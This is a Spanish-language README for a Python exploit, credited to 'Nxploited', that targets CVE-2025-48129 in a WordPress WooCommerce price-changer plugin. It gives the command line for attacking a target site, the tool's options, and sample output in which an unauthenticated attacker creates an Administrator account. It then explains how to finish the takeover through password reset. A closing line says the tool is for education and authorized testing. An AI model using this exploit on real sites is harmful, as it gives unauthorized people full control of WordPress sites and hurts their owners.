
WordPress Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light Plugin <= 2.4.37 es vulnerable a la escalada de privilegios
<= 2.4.37CVE-2025-481299.8 (Crítico)Los atacantes no autenticados pueden escalar privilegios creando una cuenta de nivel Administrador sin necesidad de acceso previo. Esto permite tomar el control total del sitio WordPress.
Clasificado bajo: OWASP A7 – Fallas de Identificación y Autenticación
Este script de Python ataca versiones vulnerables del plugin y registra un nuevo Administrador de WordPress utilizando solo un correo electrónico y una contraseña (hash mediante MD5).
python CVE-2025-48129.py -u http://target-site.com/wordpress -mail [email protected] -p nxploitadmin
python CVE-2025-48129.py -help
usage: CVE-2025-48129.py [-h] -u URL -mail MAIL [-p PASSWORD]
CVE-2025-48129 - Unauthenticated Privilege Escalation Exploit by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL (e.g., http://site.com/)
-mail, --mail MAIL Email for the new Admin account
-p, --password PASSWORD Password to set (default: nxploitadmin)
[*] Checking plugin version...
[*] Plugin version: 2.4.37
[*] Vulnerable version detected. Exploiting...
[+] Exploitation successful!
[*] Login credentials:
Username: [email protected]
Password: 21232f297a57a5a743894a0e4a801fc3
[*] If login fails, reset the password manually via:
http://target-site.com/wordpress/wp-login.php?action=lostpassword
En algunos casos, iniciar sesión directamente con la contraseña elegida puede fallar.
Esto no es un error del exploit, sino un resultado de cómo el plugin vulnerable pasa las contraseñas con hash al sistema interno de creación de usuarios de WordPress.
Si no puedes iniciar sesión, simplemente restablece la contraseña por correo electrónico usando la siguiente URL:
http://target-site.com/wordpress/wp-login.php?action=lostpassword
WordPress enviará un correo electrónico de restablecimiento de contraseña a la cuenta de Administrador que acabas de crear, lo que te otorgará acceso completo.
Esta herramienta se proporciona únicamente con fines educativos y de pruebas de penetración autorizadas.
El autor no asume ninguna responsabilidad por el mal uso o los daños causados por este script.
Por: Nxploited ( Khaled_alenazi )